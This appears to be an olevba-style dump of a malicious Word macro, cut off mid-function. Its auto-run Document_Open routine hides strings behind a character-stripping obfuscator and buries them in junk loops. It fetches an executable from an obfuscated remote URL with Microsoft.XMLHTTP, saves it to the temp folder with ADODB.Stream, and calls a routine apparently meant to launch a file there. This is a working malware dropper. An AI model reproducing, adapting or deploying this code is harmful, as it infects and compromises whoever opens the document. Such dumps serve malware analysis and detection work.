Filename     : ./macros/723c687885ce69a174962fe16bf3ef4118a3430e9efed167dd8dcb88b9a214d5
OLE stream   : Macros/VBA/ThisDocument
VBA filename : ThisDocument.cls
----------------------------------------
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub PUCgOp(JKsDOeI As Boolean, LtWJMMA As String, mDNdIw As Boolean)
    ushSr = LTrim("JPQM&VBY.?SByV!ZtpR")
    ushSr = StrReverse("uKubO&fu_#$")
    cxoTqk = LTrim("EFV_-Zvye!lKX!Zk")
    While sdyVdu < 249
        IiVYKJNx = Space(19)
        HYvHeJl = "_p&zaNyeVR]" + "Lkk[$L^jcZy%$N[B" + "Qvtap[ykbm*"
        kBCkcXu = Right("p^NYL$A-dk@gSqrWZ", 2)
        cxoTqk = Space(1)
        CqkEFrl = 1194 + 362 + 1588
        gIuQgVf = 1533 + 728 + 1551
        rjzGslkX = StrReverse("F Kw#Oq_pU(Xr]?oIq%M")
        gIuQgVf = ".a%J-[MCz#cGFZ!C" + "oXDQ%nmZqS)KvH%ose)V" + "w@Wg#(aIZiQzA"
        IiVYKJNx = 137 - 919 - 1768
        JbEbqpzY = Right("MudXoh dlHry", 2)
        sdyVdu = sdyVdu + 3
    Wend

    ushSr = Space(3)
    CqkEFrl = LTrim("V#?@FWyv*.uzjr")
    sXNgp = UCase("JIF(*]MYqMcPfGTlw")
    For SZJIuG = 0 To 265
        JbEbqpzY = Left("-zA&?WY#!qWQc!st", 3)
        exfwQq = 1848 - 1992 - 749
        JbEbqpzY = RTrim("pSVTLP%YEP^SnG&L")
        gBUyHb = RTrim("r-_t?sbRC@RxOUpR__m")
        ushSr = Space(11)
        HYvHeJl = 1407 - 139 - 289
        gIuQgVf = Right("-?*QUnqC(FfnneeYlls", 4)
    Next SZJIuG

    rjzGslkX = StrReverse("Uh@*#Nqv$I[)B)k.Wt(V")
    IiVYKJNx = Left("(q#Whr#Z^Q", 3)
    For gnIotV = 0 To 311
        kBCkcXu = RTrim("pTVGZr@&gaEw_x*]J.")
        gBUyHb = 1778 - 1968 - 1314
        gBUyHb = 1827 - 239 - 153
        gBUyHb = RTrim("_fP?Zj#da@@l@eoQ.[s")
        kBCkcXu = Right("nRCNE(KakvS", 3)
        sXNgp = Space(2)
        ushSr = StrReverse("qTEv[#W[^]LiKfdQ")
    Next gnIotV

    For SiPTxS = 0 To 33
        sXNgp = 372 + 1247 + 1610
        HYvHeJl = RTrim("ZWziEd]oSCn")
        rjzGslkX = 934 - 1223 - 697
        kBCkcXu = "?%fV!x&@]fLDByZuM-" + "y(KkAfVTqdu&[" + "J*fm%jwsrgIL*Z"
        kBCkcXu = 1559 - 396 - 1089
        gBUyHb = LTrim("JXn?NtbVo^%B")
        HYvHeJl = StrReverse("LBGdUceBFs_zNiwv[@n")
        CqkEFrl = UCase("xZL@!Y%*-R")
        kBCkcXu = RTrim("F]I!Uanue]#-im@$atT")
    Next SiPTxS

    For CSUBAo = 0 To 12
        CqkEFrl = "NjiXV$HW[GAB" + "[gsdU?mkW]" + "nV*-@&pP)UOoa"
        HYvHeJl = Right("tPQ_%UIxJxY?", 5)
        gBUyHb = Left("L.RkmJ%HKS[G.fMh", 5)
        IiVYKJNx = UCase("dzv^?!y ET ")
    Next CSUBAo

    IiVYKJNx = "IW*]Tc&Uci" + "iDFpLcoaERb)OSg" + "R)Dhk.i GeKL"
    For lOFTQL = 0 To 352
        IiVYKJNx = Left("-JiiAH%@e D]G", 2)
        rjzGslkX = Space(19)
        HYvHeJl = "khM-uH IInlX.@" + "VCTRhK$ -[bwvD" + "M&AHM&sFZKIRn#T"
        exfwQq = 902 - 1714 - 459
        exfwQq = RTrim("AsiuqSt$a^OLW)g(OA")
        kBCkcXu = UCase("nbfMA!eT(kHk")
        cxoTqk = Left("uNlUfSgqhfe_(", 3)
        gIuQgVf = "dMT%$)RhjxtRFXTCyaj[" + "A(lIIk&)Xx)?njcO" + "Ds-E%NWbRn$HZcTnFkox"
        exfwQq = Right("R-MTAo!wmflVvLKfbZ[", 3)
        CqkEFrl = LTrim(")T(V^aCKnMUB%")
    Next lOFTQL

    ushSr = 1641 + 1719 + 367
    While lASkej < 169
        HYvHeJl = "wbv!BDMeRhhrSV" + "LVHnrCrukZ" + "dwujWNHfro_"
        gIuQgVf = 1583 + 1881 + 1646
        CqkEFrl = Right("Qjm)MebgH%UWKKBeazLb", 5)
        kBCkcXu = UCase("Wq@u?ya-PEu(")
        gIuQgVf = StrReverse("MdBeq#t#BA-Mc")
        cxoTqk = StrReverse("Ui]ohL*%ibkQa")
        CqkEFrl = LTrim("v[]JvMP&A#AG")
        kBCkcXu = StrReverse("qk^AnvFOApPNlJA&O")
        lASkej = lASkej + 3
    Wend

    HYvHeJl = RTrim("$K&m*ln-]G@gmPU%")
    gBUyHb = 297 - 1212 - 638
    While IPCtbA < 123
        gBUyHb = Left("-[Jp^-y%lw*", 3)
        gIuQgVf = Left(" .t@G!%@CsBFLoAW", 3)
        cxoTqk = 1892 + 118 + 1633
        HYvHeJl = "Dz_iUk&@Bp" + "K#VZ r$hfvX ]#P%A%- " + "ZxSl*!*]Cr[C"
        IPCtbA = IPCtbA + 3
    Wend

    gBUyHb = StrReverse("IViEPHXFD]WGp")
    gBUyHb = UCase("D.RmUna.O? -")
End Sub

Private Sub Document_Open()
    Dim NvnUsJTt As String
    gIuQgVf = "cU^)*KdZXioJ " + "GW%vfTq@)%vpJFh[JQ)W" + "^tvUkUQ[LbiH?h%N(FJy"
    JbEbqpzY = 889 - 1097 - 972
    gIuQgVf = LTrim("fiMp*YE)QM)M-z")
    gIuQgVf = RTrim("EkWeYv!Cl%q[")
    For XJdXyI = 0 To 267
        rjzGslkX = RTrim("$hHMOJXuog*EcMJ.@")
        IiVYKJNx = UCase("%]Xm^_hwLn")
        sXNgp = LTrim("NvTwJUfT%KC@S")
        ushSr = StrReverse("pfgc-%wo-%q ")
        kBCkcXu = StrReverse("v-_[ ZKjuCKbl%k")
        sXNgp = 245 + 995 + 634
        JbEbqpzY = 503 - 229 - 1517
    Next XJdXyI

    cxoTqk = Left("QzArRJ#h QjpwG$qIMjQ", 3)
    Set xDmidVZh = CreateObject(HzCqYzL("smc]r-ixp&t^iGnMgm.(fHiSlDeisoyWs*tzejm*oBbUj!ehc@tc"))
    rjzGslkX = Left("jG$CSHR@dxid#P", 5)
    ushSr = Left("#)PJHv..c]Zrap_mOpo#", 5)
    While CAEyZW < 295
        exfwQq = 1853 - 1511 - 1957
        gBUyHb = UCase("cvLF*vgN(lOh-Uu@e.n")
        gIuQgVf = StrReverse("zpEB#ccRc.)%")
        CAEyZW = CAEyZW + 2
    Wend

    cxoTqk = UCase("WKA@x$ P]&UuURUXrZL")
    For iMTDeO = 0 To 371
        IiVYKJNx = "$]WJd#^fB%y B*%aRV" + "tB%m^qTMpXzRERS!jX" + "$Wj [!mLLwR"
        JbEbqpzY = "hoKLGv*ynYXue&Km$ &#" + "VgkRT&AVY-q" + "TUOdaPzgSaa]m"
        gIuQgVf = 697 + 1973 + 542
        cxoTqk = LTrim("regxI^K)ie")
        HYvHeJl = 1688 - 378 - 1428
        gIuQgVf = 1081 + 1094 + 1348
        exfwQq = LTrim("aL^O?CFPyKLTQ")
    Next iMTDeO

    gBUyHb = RTrim("O)rU@YBdyBEJN$XPFMbS")
    KtYTODI = xDmidVZh.GetSpecialFolder(1 + 1)
    JbEbqpzY = Space(2)
    For qADtkb = 0 To 138
        sXNgp = RTrim("RHPl-%FiWM")
        sXNgp = Left("v$az^kVSA. ", 4)
        cxoTqk = Space(4)
        ushSr = "xw#Hx__JaBPbQL$%lRQH" + "Li (KZkCVi#V^#djkV#" + "OU-!fnh^!dybp(@bz"
    Next qADtkb

    ushSr = Right("jRRWtzov(w", 2)
    exfwQq = 1965 - 1538 - 885
    gIuQgVf = StrReverse("[i$^JGJkhsbg")
    While YalOBz < 187
        cxoTqk = LTrim("LDxNIjggHoq&Z")
        kBCkcXu = UCase("f%wn]?!iPOdq-ze Lq")
        cxoTqk = LTrim("-y^vl[fcoOF)")
        gIuQgVf = "YzNSP%YmkSl&AdmwNJ[" + "$oELlIbkNsKEuXW_" + "!)]R(Z!o_ofc"
        YalOBz = YalOBz + 2
    Wend

    NvnUsJTt = StrReverse("qesxpez.yEHBDL?fUS)K")
    rjzGslkX = RTrim("b[YTkD(XTBu")
    exfwQq = 742 - 189 - 152
    HYvHeJl = 1257 - 1011 - 233
    gBUyHb = 1098 - 1236 - 717
    rjzGslkX = 1285 - 593 - 1129
    While OSayhn < 296
        rjzGslkX = StrReverse("FZwF&[)y*ds^YFZ")
        JbEbqpzY = LTrim("LTqNvmCTIY]mMXqYPY")
        HYvHeJl = "ePPv)U&Ws wdT*mET %" + "U !vP)-IqNIn[" + "PdrO-?Z@&.]fdn$a"
        exfwQq = RTrim("ddhTRgf^grxYeak")
        IiVYKJNx = Left("HHCXQ)d-Sk?AcKprKQQ", 2)
        kBCkcXu = "Zl.K-R^$NWAcAIKZx MD" + "fqxok*V?OTwTe&" + "$fRMa%?sQU%z-G"
        gIuQgVf = 1072 + 270 + 1017
        gBUyHb = 175 + 1364 + 225
        kBCkcXu = StrReverse("%Gfoo[I!g?_WspScRg?")
        OSayhn = OSayhn + 2
    Wend

    For NuyiAp = 0 To 379
        IiVYKJNx = "OzHVGEAXNZ*C" + "q%JSB?y)hbvqxzHDHV" + "YYHMVXmr&EjN"
        exfwQq = 617 - 813 - 1015
        rjzGslkX = Left("Yv?Rq*gZ%nbb", 2)
        ushSr = 1482 - 685 - 1139
        ushSr = Left("igi_UPmF[C.dV&%sE(Od", 5)
        sXNgp = StrReverse("$sqKJyNv%e$a(RLN")
        sXNgp = Right("$^[yEG&rBAzeMtd-%", 4)
        HYvHeJl = LTrim("p_nTRJX.zocA]Z(RV")
        IiVYKJNx = Right("[HCy(uDXcmnQvxy$P -", 2)
    Next NuyiAp

    ushSr = "JNiXUlRrChNV&" + "DxMt^P#w$ok!" + "Omzq.S).cebrDeUxFB"
    IiVYKJNx = Left("QISATPQ[aG", 3)
    HYvHeJl = Space(5)
    gIuQgVf = Right("@qVjL*) rDV[&BLaD*OI", 5)
    ushSr = 591 - 247 - 981
    While KxvsBH < 151
        cxoTqk = LTrim("[^.-SAGj?tIlYUyJ")
        cxoTqk = StrReverse("K?BXDgBKnnvQpYH#")
        cxoTqk = 901 + 1924 + 497
        KxvsBH = KxvsBH + 1
    Wend

    cxoTqk = 1981 - 680 - 132
    gBUyHb = Right("bww*zc-Njvw@ZVS%H", 5)
    For vcFomX = 0 To 333
        kBCkcXu = UCase("vPRn#SHhHSU")
        sXNgp = "aQW$C.^h@. DFo?#" + "GlWTtLxLWArGiZa?" + "ceUqozIylw?!^ayi"
        HYvHeJl = StrReverse("oZXkobLpIbqt@U")
    Next vcFomX

    CqkEFrl = UCase("Nrr]arVpkQURS%$*VEII")
    Dim aBXGD, SCXNfE As Object
    ushSr = Space(7)
    gIuQgVf = "y__SjC@NtWYnJ!" + "ql[yKT*lsLfC[" + "uNrBH()urbk"
    IiVYKJNx = Left("G-ky!GqNt.mNOIiP", 4)
    cxoTqk = Right("$xqN]HWvxt ", 4)
    Set aBXGD = CreateObject(HzCqYzL("M%iRc]rEobs?oOfxtq.wXkM!LTHAT%TtPJ"))
    While tExKce < 342
        rjzGslkX = 157 - 1596 - 960
        rjzGslkX = StrReverse("W?c_e[moN-")
        gIuQgVf = RTrim("y@f]oy*wf^")
        IiVYKJNx = Right("c@zdxhMrMYkJwtkJ-Q", 3)
        exfwQq = RTrim("%I amv%daXl")
        HYvHeJl = "gMLwC)C!nRvGyE(*dpYY" + "_nl*KP*Z^NubX" + "*pGMHvIy&W*goA"
        gBUyHb = UCase("mr&N#AyOSB")
        ushSr = Left("u H?CDfLUMI.&Zaht.K", 5)
        JbEbqpzY = Space(16)
        sXNgp = UCase("FXC-!gIAuYYOzEZaG")
        tExKce = tExKce + 3
    Wend

    JbEbqpzY = LTrim("eIl?i%]tix!uR_UUB")
    For zAkioA = 0 To 245
        rjzGslkX = LTrim("eqPQPP-[%U@& Bs)swC")
        sXNgp = UCase("mKQscnWwVKaT")
        kBCkcXu = 1913 - 1974 - 1911
        ushSr = Left("Ny#Nqappo?@&fFLsY_h", 4)
    Next zAkioA

    exfwQq = 1220 + 1537 + 1488
    sXNgp = "RWksW_g*rBT#a($eiL" + "e^DC^NEI$t_ACQw" + "xjQD%Ma(FN"
    Dgfpck = HzCqYzL("hQtFtypm:w/m/OaYsMspe&tysuodpotgi@oMn$.JcKohm-/bmKa#xzi@.oezxCeo")
    gBUyHb = RTrim("&y&mt$slLU)l")
    HYvHeJl = 308 - 293 - 1118
    gBUyHb = 222 + 1374 + 1543
    For uCAAHq = 0 To 336
        kBCkcXu = LTrim("(r@%Crc&WNGGzHr&Swz")
        HYvHeJl = LTrim("tRqf*emn oL@")
    Next uCAAHq

    rjzGslkX = Left("vTTDWtR@o k", 4)
    aBXGD.Open "GET", Dgfpck, False
    gIuQgVf = Left("es&H_b%!SObYu", 4)
    While agjIFx < 376
        CqkEFrl = 1555 + 1342 + 139
        gBUyHb = RTrim("MfB$sB-y%vVqDvb")
        gBUyHb = UCase(".FaEFTvYVj ")
        kBCkcXu = Space(19)
        agjIFx = agjIFx + 3
    Wend

    For CtbYAj = 0 To 396
        rjzGslkX = RTrim("Bci?T%O_c^f")
        JbEbqpzY = 1340 - 1667 - 1120
        CqkEFrl = 522 + 356 + 338
        gIuQgVf = StrReverse("WVfPm(wp.TKJ(")
        HYvHeJl = 1981 - 859 - 1489
        CqkEFrl = RTrim("y VctU]OjtF(zzX")
        CqkEFrl = RTrim("klMRK#N%cX^hK")
        cxoTqk = LTrim("$_^kGMF$X#afS")
        CqkEFrl = "JrCWkKFlRQPD " + "qi&OxCLs]zx^RTeqo@!" + "&zQrucA&(Owi%"
    Next CtbYAj

    gBUyHb = UCase("FBtq%g@[!Gn!db#l@o")
    CqkEFrl = StrReverse("DmHZvLcO#UOWhOw")
    aBXGD.send
    JbEbqpzY = Right("gE$A?_qpG&(PP", 5)
    gIuQgVf = Right("-aD.I!D$dLq^gw*&@eqn", 3)
    cxoTqk = "HJH(EwXjesW" + "yc-U]RC@ ICN" + "([M*sQxnD.yEQaFC"
    kBCkcXu = LTrim("xrWTXbs)]Q(]SflNi")
    cxoTqk = Left("K]cCqxJW*Zg", 2)
    If aBXGD.Status = 201 - 1 Then
    For btAePa = 0 To 392
        IiVYKJNx = RTrim("m#(kr_MCac")
        cxoTqk = Space(16)
        CqkEFrl = RTrim(")AD[BcsjdC?nohp%T?f")
        kBCkcXu = 836 + 1766 + 335
        kBCkcXu = ")C@.B.!GNenj" + "^z]$brzEqhpa$OsFulVG" + "spp^ZkO)Ygi$rEY_"
        IiVYKJNx = Left("pit^XsuRNM!jbGeTAPnM", 5)
    Next btAePa

    CqkEFrl = "-tAP)IUYQKXjWpRpyU" + "qwIf[jJR(W#G*AU" + "f!lL[r-KJy.X"
    gBUyHb = 1698 - 779 - 783
    JbEbqpzY = 301 + 853 + 810
    While lbsMvW < 157
        cxoTqk = LTrim("nn)UnfA!S^Al*@myY@")
        ushSr = 1642 + 897 + 431
        HYvHeJl = LTrim("qe.FvPPfuD_)FCD.")
        IiVYKJNx = Space(5)
        HYvHeJl = StrReverse("em[DVb[(rQ N")
        gBUyHb = LTrim("qKyMl[SUDR(mYuLgC!WY")
        lbsMvW = lbsMvW + 2
    Wend

    For jxlojb = 0 To 109
        IiVYKJNx = Space(13)
        HYvHeJl = 559 + 1347 + 1989
        gIuQgVf = Right("m)Y-[%GVGAP-amD.aq", 4)
    Next jxlojb

        Set SCXNfE = CreateObject(HzCqYzL("AODcOoDOBJ.tSbtIrzeiaQmy"))
    HYvHeJl = "KW*BhP)xhjBmkOAS*nVt" + "ovMWm?aS_^Cjf[@XL-c" + "?Ag iKHBzm^xDCw?x"
    gIuQgVf = Left("*tSs&_%_DPe", 3)
    While FpNCqr < 87
        ushSr = Left("*Hg-p-!bgdzn@y%RPSw", 3)
        exfwQq = 996 - 1538 - 1154
        exfwQq = RTrim("Jhvs(gzq@%]HMJME!b A")
        ushSr = 599 - 1836 - 389
        exfwQq = Space(6)
        exfwQq = StrReverse("eX[rc^pptAw-f#")
        FpNCqr = FpNCqr + 1
    Wend

    gBUyHb = LTrim("%z*)P-d%(Q")
    HYvHeJl = LTrim("ng*iXGHXD)(j")
        SCXNfE.Open
    gIuQgVf = RTrim("g$oBnRSog_")
    While TPjYdA < 349
        HYvHeJl = "oPAL&ASt*Gnvw@" + "Pg]hTq-wT%N" + "WYz?r?A%s[!jY"
        CqkEFrl = RTrim("bF o%IZujdo")
        HYvHeJl = LTrim("GiSIY)zQFu")
        sXNgp = "VU(uPjdLXvncemL)" + "c%fhn.cqjKz&$^k?DHi" + "]sfwtlTfnp%w#by(HCqr"
        JbEbqpzY = Right("TBCmnFDM)^-)X&ZtpDeg", 5)
        CqkEFrl = Right("x!uKgX#rYC", 3)
        gBUyHb = Space(16)
        TPjYdA = TPjYdA + 3
    Wend

    kBCkcXu = RTrim("^I$#C)ntaareMsAP# K")
    For ZtDKOC = 0 To 284
        gIuQgVf = Left("]rKdFYF@.qkG", 4)
        IiVYKJNx = RTrim("t@%wkuP^KxF sg%J[inO")
        gIuQgVf = LTrim("X-%()-WAPp$Fcl")
        gBUyHb = Space(14)
    Next ZtDKOC

        SCXNfE.Type = 1
    rjzGslkX = UCase("N?bvu)at@T%_Cr)")
    cxoTqk = "ji)HEOwtnE@xvn^" + "xqiz.VEg N$^." + "^V& qq#.B!W-#IqliiM"
    sXNgp = LTrim("L*QMXbloVak)olObPQ")
    rjzGslkX = Right("D?DSn#BjNAezaB^*DU-", 4)
    JbEbqpzY = "N(eB_ZyWH$Sb*OGpB iB" + "jxHbdUQyjM" + "cnP%D_[G%Nu-*t"
    For CRbNNR = 0 To 154
        gIuQgVf = UCase("i&[g_W[weH^Os^b%")
        exfwQq = "*d[Pgc@jWCD" + "c.I^Y)SZQJD.m#lBo" + "NYSLpgEc#Shv?xjq"
        gBUyHb = Space(19)
        gBUyHb = LTrim("r.vpKGmIdak")
        exfwQq = "i[.DbYjLq#" + "Tn@eurEZl)vOQH#V@uft" + "L#&GeHzkja_"
        sXNgp = 1373 + 146 + 1987
        JbEbqpzY = "TYNggO.J)ZHL!p%&p" + "m&SGfeZ-#M@Y" + "if?(C#B%eC& _jXV?*t"
    Next CRbNNR

    rjzGslkX = 981 - 346 - 217
        XegOds = aBXGD.responseBody
    gBUyHb = LTrim("PDfafs@HQb")
    gIuQgVf = Left("Itbe?v-u.cPC&s", 3)
    JbEbqpzY = Space(1)
    gBUyHb = "]GzT#(yQcQ" + "j(AfOs.PLOpNq%&rP$" + "#ytCC(PGm-#TbM"
    rjzGslkX = LTrim("e.gO%TXJ.#PDwuLj)xq@")
    cxoTqk = 1075 - 1268 - 533
    JbEbqpzY = UCase("H% aiftgj_)YGYEv")
        SCXNfE.Write XegOds
    CqkEFrl = RTrim("LHHRf&El#ZTX")
    sXNgp = RTrim("Y[x^$FjFu .Ghg")
    gBUyHb = LTrim("O@jV#BBaT(pZ@i[)")
    gBUyHb = Space(11)
        Dim xYBrcqU As Object
    gIuQgVf = 1334 - 1452 - 540
    kBCkcXu = UCase("VxWU#Pp ag")
    cxoTqk = 500 - 1720 - 785
    exfwQq = Left("Yj^Akc&hd^gu", 2)
    rjzGslkX = "Wnv%^BV)XqeEIj?iNw@" + "#TBDoB?WmLqhc" + "?j#tHiK-#DDwDnv"
    While vwCSto < 98
        ushSr = StrReverse("D#*[eUD-B%Vu?%QBgrwE")
        exfwQq = StrReverse("_bowseITKpPD]YpvbW?")
        rjzGslkX = StrReverse("HOAfP%Xyu ?A$&?y- O")
        CqkEFrl = RTrim("nTkJIRnjQFkLkGwjZE")
        vwCSto = vwCSto + 1
    Wend

    ushSr = StrReverse(")VeLthL!qYt kPt")
        Set xYBrcqU = CreateObject(HzCqYzL("s-c$r@itp$t$iKn_gi.mfWi&lleMswyKs^tpe*m&oXbPjIevcLt@"))
    rjzGslkX = Left("mYow#h!tk?iAH*T", 2)
    For tAEadM = 0 To 126
        sXNgp = Space(8)
        ushSr = UCase("sIexiMy$GludgQqVAEj")
    Next tAEadM

    sXNgp = Right("]G_AgkS&bY-xT", 5)
    While yeetEg < 384
        gBUyHb = StrReverse("V#AWkyxT&wrn")
        HYvHeJl = 290 + 1748 + 1531
        CqkEFrl = Left("ESfD?s.d$Le", 3)
        kBCkcXu = Space(18)
        JbEbqpzY = RTrim("Swi*A^vLI.wGU")
        exfwQq = Left("wVIlH)#Eeme)lrn[", 5)
        cxoTqk = 1390 + 1554 + 1193
        yeetEg = yeetEg + 2
    Wend

    gBUyHb = Space(11)
        iVgHVok = xYBrcqU.GetSpecialFolder(5 - 3)
    JbEbqpzY = Space(6)
    HYvHeJl = Left("kwKj^vBTLM*sUz$c", 2)
    HYvHeJl = 541 - 210 - 154
    For WEiLCz = 0 To 244
        HYvHeJl = "UrI(gPlCBfyLhp" + "NR)y.EFFeq.SN" + "!-Nmh^lBcGJ"
        ushSr = "Jwj-PG&mr?vw*-" + "IAI[d(zoWxX-K" + "LB%aSrWa!vs?h"
        kBCkcXu = LTrim("?AWE*A#qCWgt!PV_")
        rjzGslkX = Space(4)
        ushSr = LTrim("Rd(]Q[*$!(I")
        IiVYKJNx = UCase("j^cnk_zlGc-SA!_")
        HYvHeJl = 349 + 1156 + 1001
        JbEbqpzY = Left("grSMKG!AroHg)lk%", 4)
        JbEbqpzY = Space(11)
        gBUyHb = UCase("CBUX.X@$Gb?d^.nEnLIt")
    Next WEiLCz

    ushSr = 1774 - 1773 - 329
    HYvHeJl = UCase("DjmKT_tie#Qv)")
        Call SCXNfE.SaveToFile(iVgHVok & "\\" & HzCqYzL("KPSMfuL%BjEe.hecxfef"), 2)
    gIuQgVf = 133 + 877 + 1971
    While mYCjxV < 211
        ushSr = "xB&Nqcsq!zC&GHjcJq@)" + "#Wt?(e.ePoVhYJ" + "QURCc^-^_RdZfP([IGY"
        cxoTqk = "IQgY)JBDJ.a&gk]" + "*mZcTcjOg#DoV&cLx-" + "WH R$?yrrbaaDwJ"
        gIuQgVf = 681 + 1616 + 877
        rjzGslkX = Space(10)
        sXNgp = LTrim("I$IM@%L&ojW")
        mYCjxV = mYCjxV + 3
    Wend

    JbEbqpzY = 518 + 1549 + 629
    sXNgp = Space(5)
    kBCkcXu = Left("Rg-OCOs]doJ$KCczXF", 3)
    kBCkcXu = StrReverse("dF[^UKMBKwctj]SF")
    HYvHeJl = Right("Qm$. ngqquoJNl*", 4)
        SCXNfE.Close
    ushSr = "vfEPct?W%GUHNiqrAMf" + "R(])GJqgok-Q%MjM@" + "KeevmS)#IK*_.RS"
    gIuQgVf = LTrim("mIQW*s]yuYDVV")
    IiVYKJNx = 182 - 1950 - 1668
    HYvHeJl = Left("fTROnAXKjtyU)%uL", 4)
    End If
    exfwQq = Right("Z@L$*i^del#]B%tA#Vba", 4)
    For LbcyLK = 0 To 269
        HYvHeJl = Space(6)
        ushSr = StrReverse("Ccl$@awNlkEyy]Kh&((w")
    Next LbcyLK

    HYvHeJl = 1787 - 812 - 260
    gBUyHb = UCase("AtciY*P&]^Z-t$K")

    sXNgp = "gulZdipQ? QJDacg.#u-" + "WJpGAolD.DdHML" + "hyqvp$qVeY_F"
    IiVYKJNx = 1061 - 876 - 220
    sXNgp = Left("cGGXb)o[BXG$m D", 5)
    cxoTqk = LTrim("DmqDVTeLNi")

    While zmzzAdo < 426
        JbEbqpzY = RTrim("fPUnmVMv-(l")
        exfwQq = RTrim("I^OAtdqoBG![O")
        CqkEFrl = RTrim("!g$s)uTGK$lsut")
        cxoTqk = 1313 - 1473 - 326
        If zmzzAdo = 425 Then
            Call KvDwyT(KtYTODI & "\\" & HzCqYzL(NvnUsJTt), "YhQAW", "Nuqb", "CWGXwOFIqr", "bkw", "QwRWQqlvU")
            For pKTLPa = 0 To 192
                exfwQq = LTrim("EzT[YVfnJonUZAwtW")
                gBUyHb = RTrim("B!A[I*W ObjyPbs%yX")
                HYvHeJl = UCase("$E&ZOUE^!_Pknfqg")
                HYvHeJl = Left("bzI^.j#y#$_", 3)
                gIuQgVf = Left("_CrkmjjDsHFWXVs)ES#O", 4)
                cxoTqk = "OoCs[aLdiHjhh" + "JSxI*g^gkKh rmq.@%" + "UsGDeONKhfZDdQ"
                gBUyHb = UCase("*S TJFAK[x_nssmTvM")
            Next pKTLPa

            sXNgp = Space(14)
        End If
        gIuQgVf = Space(19)
        kBCkcXu = Space(9)

    zmzzAdo = zmzzAdo + 1
    Wend
    rjzGslkX = StrReverse("FpzO?.neFpgYXu")
    kBCkcXu = RTrim("JH_PI%_r^LitZa")
    exfwQq = RTrim("H^c%hjhqim@Ovu")
    gIuQgVf = LTrim("VZhY(hHjwRG")
    For ApKhih = 0 To 305
        exfwQq = 447 - 651 - 1709
        gBUyHb = Space(9)
        IiVYKJNx = Space(9)
        gIuQgVf = StrReverse("sMs]%@K&C#mCLH(wv*")
        exfwQq = RTrim("CVozgnIWoNw^$#WpbCG")
        kBCkcXu = StrReverse("!SgVT$ePFzblEXRw%oAP")
        JbEbqpzY = 474 + 1422 + 1710
    Next ApKhih

    gIuQgVf = "MuVkkVGG$G" + "aIw@fK?R.]EPYn" + "t^%P.(f$H?Cj(T"
    CqkEFrl = UCase("a_A$TrOPBA*P- ")

End Sub

Private Sub ucRIDH(wUNVyMf As Boolean, xDneGh As Integer, uVusPcz As Boolean)
    exfwQq = UCase("$I[h^ bJbk-r%bawX)")
    exfwQq = Left("[S]?%FrEKRARC", 3)
    ushSr = UCase("jaQGjGbogyzN#U")
    gBUyHb = Space(5)
    JbEbqpzY = Right("vSlMVg]]KiQ]", 5)
    kBCkcXu = "ofkN?R]&gV(O" + "ypXa.EpWFYq!n%]M" + "jTJJ!JHoQoiALE*Pqo"
    ushSr = Right("zQ^lodnva(Gq", 3)
    While snUYCz < 196
        HYvHeJl = Space(17)
        kBCkcXu = Right("hL])HJaAF&K", 4)
        exfwQq = LTrim("sO](bs?xOhC#k-TT")
        cxoTqk = UCase("OMhsKD[*o?oY")
        JbEbqpzY = "DxnlYA (At)?Hf]Bnk&" + " J PHbHm#)" + "DPO-.L*&B&.N"
        kBCkcXu = Space(9)
        CqkEFrl = Right("$T&OhxKt(GQj)doH@", 2)
        HYvHeJl = Space(4)
        cxoTqk = StrReverse("$DIA&P^CFZAK!Cb%H^)g")
        sXNgp = Right("C-jg_[_nbr%C", 5)
        snUYCz = snUYCz + 2
    Wend

    cxoTqk = LTrim("v#nlPeFhRZ@B.bARHQsW")
    JbEbqpzY = Left("(n gnTZsyMJ#z]!di", 5)
    exfwQq = LTrim("DpdrWB$Ld_ I")
    HYvHeJl = Space(16)
    rjzGslkX = RTrim("YE?^o$gyugzCAKJ?QS_")
    cxoTqk = UCase("vIwQDQLQVuh#).UCq")
    sXNgp = Space(2)
    While DKbJbC < 302
        sXNgp = LTrim("@&ql[sHGJfaAxso%H.!")
        IiVYKJNx = Right(" r@flJ?-ahe#L", 2)
        kBCkcXu = UCase("n@iQUZphi[sZqb")
        cxoTqk = StrReverse("SY)tpOO& &tie")
        cxoTqk = Right("qbteeZZ?wpvrPa!YkG", 2)
        CqkEFrl = 858 - 437 - 1313
        gBUyHb = 774 + 197 + 498
        IiVYKJNx = Right("$%u DDi O@_T!UX]", 4)
        kBCkcXu = 125 - 1941 - 1223
        DKbJbC = DKbJbC + 3
    Wend

    While nyqmMi < 328
        gBUyHb = StrReverse("VTOm(cpBLf_d")
        gBUyHb = Left("Dl%Feqdigz", 2)
        JbEbqpzY = "M LE?H*h$vqb!^mxZP_" + "$?ETDl)s^Ps" + "zDqICG&w@EXJS(vv]Mdt"
        IiVYKJNx = 1149 - 413 - 266
        ushSr = RTrim("]yacxbhOt(z&iQ@DayKL")
        nyqmMi = nyqmMi + 1
    Wend

    While hCINZr < 173
        HYvHeJl = LTrim("bduedmn][T")
        cxoTqk = StrReverse("-d@eWqk((qLxo#^")
        IiVYKJNx = "$jQ-u??Re-" + "fsrgpEFdU) tAW " + "IoXaRSVLbM"
        ushSr = LTrim("?CSJTQ_uKzi#Tv")
        exfwQq = LTrim("$*xW%ksJiCgaBbW")
        hCINZr = hCINZr + 1
    Wend

    cxoTqk = RTrim("F!PLjwv][fywwoFR")
    rjzGslkX = Space(16)
    gIuQgVf = 1966 + 772 + 591
    gBUyHb = Space(9)
    cxoTqk = RTrim("wl%nJnk(z#!e*-qB_w")
    For HtZgiX = 0 To 177
        rjzGslkX = UCase("?jZe pZZz)")
        CqkEFrl = StrReverse("Cv._CSx#].!ZN)C?")
        CqkEFrl = 1877 - 1607 - 531
        sXNgp = RTrim("t#S@K&ETu(c*?FFfc")
        gBUyHb = ".@rE@hbm.RRMR)%lV" + "vnCSbwZxwhm%Rv]BUrf" + ")&Ce&W@Q*ipIZupy%"
        gBUyHb = 939 + 144 + 449
        HYvHeJl = "H@kRUkyCAab" + "ruKlXeVwG*PlKmH" + "s.MB!?JJkxk.T-)EfSp"
        rjzGslkX = ")%BLwec(.s" + "a#s^U#oJ!E" + "fwfOnkpzWqcJ M^S?"
    Next HtZgiX

    IiVYKJNx = RTrim("kbv.dlKrxv][")
    gBUyHb = Space(11)
    While HONMpG < 121
        cxoTqk = "EmxhBW&DlL" + ")xUiVt^ I$xNnW" + ")UYkrm@d_vod^N"
